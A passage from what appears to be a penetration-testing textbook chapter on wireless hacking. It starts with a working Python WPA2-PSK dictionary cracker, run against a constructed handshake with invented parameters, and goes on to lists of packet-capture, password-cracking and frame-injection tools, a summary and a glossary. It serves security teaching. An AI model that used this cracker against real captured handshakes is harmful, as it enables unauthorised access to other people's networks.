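# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81; the MIC is 16 bytes.
MIC_OFFSET = 81


def pmk(passphrase, ssid):
    """802.11i pre-shared key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk(pmk_bytes, aa, spa, anonce, snonce):
    """PRF-512: HMAC-SHA1(PMK, "Pairwise key expansion" || 0 || min/max(MACs) || min/max(nonces) || i)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]  # KCK = bytes 0..15, KEK = 16..31, TK = 32..47


def eapol_mic(kck, eapol):
    """WPA2 key descriptor version 2: MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol):
    """Dictionary attack: for each candidate derive PMK -> PTK -> KCK and compare the MIC."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return candidate
    return None


def make_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed EAPOL-Key message 2 of the four-way handshake with a MIC computed from `passphrase`.

    Stands in for a capture; a real attack takes message 2 (or 3) plus both nonces from the air."""
    key_info = 0x010A  # MIC bit, Pairwise bit, key descriptor version 2 (HMAC-SHA1 MIC)
    body = (b"\x02" + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big") + bytes(8)  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))  # IV, RSC, ID, MIC, data len
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type 3 = EAPOL-Key
    kck = ptk(pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]


# Invented network parameters and wordlist.
SSID = b"corpnet"
AA = bytes.fromhex("00aabbccddee")   # authenticator (AP) address
SPA = bytes.fromhex("1c1b2d000001")  # supplicant (client) address
ANONCE = hashlib.sha256(b"demo anonce").digest()
SNONCE = hashlib.sha256(b"demo snonce").digest()
HANDSHAKE = make_handshake(b"Sunshine1", SSID, AA, SPA, ANONCE, SNONCE)
WORDLIST = [b"password", b"letmein", b"corpnet", b"Sunshine1", b"wireless123"]


def demo():
    return crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, HANDSHAKE)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The cost of the attack is the PBKDF2 step: 4096 HMAC-SHA1 rounds per candidate, per SSID, which is why coWPAtty's precomputed (genpmk) tables are keyed to an SSID and why a long, non-dictionary passphrase and a non-default SSID together defeat it.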
Capture a wireless network's packets
An attacker captures the packets from a wireless network and analyzes them to perform attacks. The following tools are used to capture a wireless network's packets: AiroPeek, AirTraf, ApSniff, Cain, and Wireshark.

WEP/WPA password attacking tools used in wireless penetration testing
The WEP/WPA password attacking tools used in the wireless penetration testing steps are: aircrack-ptw, Aircrack-ng, Aircrack, AirSnort, coWPAtty, WepAttack, WEPCrack, and Airbase.

Frame generation software used in wireless penetration testing
The frame generation software used in wireless penetration testing includes: Airgobbler, airpwn, Airsnarf, CommView, FakeAP, Void11, and wifitap.

IDS tools used in wireless penetration testing
The IDS tools used in wireless penetration testing are: WIDZ, War Scanner, Snort-Wireless, AirDefense, and AirMagnet.

Chapter Summary
In this chapter, we learned about wireless networks, various types of wireless networks, Wi-Fi authentication modes, and types of wireless encryption. The chapter focused on the wireless hacking methodology, Bluetooth hacking, and wireless penetration testing.

Glossary
Ad hoc: Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more wireless devices that communicate directly with each other.
Infrastructure network: An infrastructure network consists of an access point that connects wireless devices to the standard cabled network.
MAC filtering: MAC filtering is an access control technique that allows specific network devices to access the network, or prevents them from accessing it, on the basis of their MAC addresses.
Service Set Identifier: A Service Set Identifier (SSID) is used to identify a wireless network. SSIDs are case-sensitive text strings with a maximum length of 32 characters.
Warchalking: Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network.
Wardriving: Wardriving is a technique used to locate insecure wireless networks while driving around.
Warwalking: Warwalking is the act of walking around with a Wi-Fi-enabled laptop to find access points of wireless networks.
Wireless intrusion prevention system: A wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools.
Wireless network: A wireless network is any type of computer network that is wireless, and is commonly associated with a telecommunications network whose interconnections between nodes are implemented without the use of wires.
WMAN: A WMAN is a wireless network that connects two or more wireless LANs in the same geographical area.
WPAN: A WPAN is a wireless personal area network that interconnects devices centered on an individual person's workspace.